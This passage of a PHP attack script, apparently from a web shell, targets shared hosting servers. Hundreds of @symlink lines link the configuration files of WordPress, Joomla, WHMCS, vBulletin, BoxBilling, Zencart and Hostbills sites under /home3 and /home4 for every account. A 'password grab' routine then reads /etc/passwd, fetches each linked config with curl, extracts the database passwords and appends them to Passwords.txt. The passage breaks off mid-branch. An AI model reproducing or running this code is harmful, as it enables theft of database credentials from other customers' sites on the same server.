  1305. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1346. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1347. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1348. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1349. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1350. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1351. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1352. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1353. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1354. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1355. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1356. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1357. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1358. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1359. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1360. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1361. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1362. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1363. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1364. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1365. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1366. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1367. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1368. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1369. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1370. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1371. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1372. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1373. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1374. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1375. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1376. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1377. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1378. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1379. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1380. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1381. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1382. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1383. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1384. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1385. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1386. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1387.  
  1388. //Home4
  1389.  
  1390. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1391. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1392. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1393. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1394. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1395. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1396. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1397. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1398. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1399. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1400. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1401. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1402. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1403. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1404. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1405. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1406. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1407. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1408. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1409. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1410. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1411. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1412. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1413. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1414. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1415. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1416. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1417. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1418. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1419. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1420. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1421. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1422. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1423. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1424. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1425. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1426. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1427. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1428. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1429. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1430. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1431. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1432. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1433. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1434. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1435. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1436. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1457. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1458. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1459. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1460. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1461. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1462. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1463. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1464. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1465. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1466. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1467. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1468. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1469. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1470. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1471. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1472. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1473. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1474. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1475. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1476. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1477. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1478. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1479. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1480. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1481. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1482. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1483. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1484. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1529. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1530. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1531. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1532. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1533. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1534. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1535. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1536. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1537. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1538. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1539. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1540. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1541. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1542. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1543. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1544. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1545. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1546. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1547. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1548. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1549. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1550. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1551. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1552. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1553. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1554. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1555. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1556. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1557. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1558. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1559. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1560. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1561. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1562. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1563. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1564. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1565. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1566. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1567. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1568. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1569. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1570.  
  1571. }
  1572.  
  1573. //password grab
  1574.  
  1575. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  1576. {
  1577.  
  1578. $ar0=explode($marqueurDebutLien, $text);
  1579. $ar1=explode($marqueurFinLien, $ar0[1]);
  1580. $ar=trim($ar1[0]);
  1581. return $ar;
  1582. }
  1583.  
  1584. $ffile=fopen('Passwords.txt','a+');
  1585.  
  1586.  
  1587. $r= 'https://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/mct_symconf/";
  1588. $re=$r;
  1589. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  1590.  
  1591. $users=file("/etc/passwd");
  1592. foreach($users as $user)
  1593. {
  1594.  
  1595. $str=explode(":",$user);
  1596. $usersss=$str[0];
  1597. foreach($confi as $co)
  1598. {
  1599.  
  1600.  
  1601. $uurl=$re.$usersss.$co;
  1602. $uel=$uurl;
  1603.  
  1604. $ch = curl_init();
  1605.  
  1606. curl_setopt($ch, CURLOPT_URL, $uel);
  1607. curl_setopt($ch, CURLOPT_HEADER, 1);
  1608. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1609. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1610. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  1611. $result['EXE'] = curl_exec($ch);
  1612. curl_close($ch);
  1613. $uxl=$result['EXE'];
  1614.  
  1615.  
  1616. if($uxl && preg_match('/table_prefix/i',$uxl))
  1617. {
  1618.  
  1619. //Wordpress
  1620.  
  1621. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  1622. if(!empty($dbp))
  1623. $pass=$dbp."\n";
  1624. fwrite($ffile,$pass);
  1625.  
  1626. }
  1627. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  1628. {
  1629.  
  1630. //WHMCS
  1631.  
  1632. $dbp=entre2v2($uxl,"db_password = '","';");
  1633. if(!empty($dbp))
  1634. $pass=$dbp."\n";
  1635. fwrite($ffile,$pass);
  1636.  
  1637. }
  1638.  
  1639.  
  1640. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  1641. {
  1642.  
  1643. //Joomla
  1644.  
  1645. $db=entre2v2($uxl,"password = '","';");
  1646. if(!empty($db))
  1647. $pass=$db."\n";
  1648. fwrite($ffile,$pass);
  1649. }
  1650. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  1651. {
  1652.  
  1653. //Vbulletin
  1654.  
  1655. $db=entre2v2($uxl,"password'] = '","';");
  1656. if(!empty($db))
  1657. $pass=$db."\n";
  1658. fwrite($ffile,$pass);
  1659.  
  1660. }
  1661. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  1662. {
  1663.  
  1664. //Other
  1665.  
  1666. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  1667. if(!empty($db))
  1668. $pass=$db."\n";
  1669. fwrite($ffile,$pass);
  1670. }
  1671. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1672. {
  1673.  
  1674. //Other
  1675.  
  1676. $db=entre2v2($uxl,"dbpass = '","';");
  1677. if(!empty($db))
  1678. $pass=$db."\n";
  1679. fwrite($ffile,$pass);
  1680. }
  1681. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1682. {
  1683.  
  1684. //Other
  1685.  
  1686. $db=entre2v2($uxl,"dbpass = '","';");
  1687. if(!empty($db))
  1688. $pass=$db."\n";
  1689. fwrite($ffile,$pass);
  1690.  
  1691. }
  1692. elseif($uxl && preg_match('/dbpass/i',$uxl))
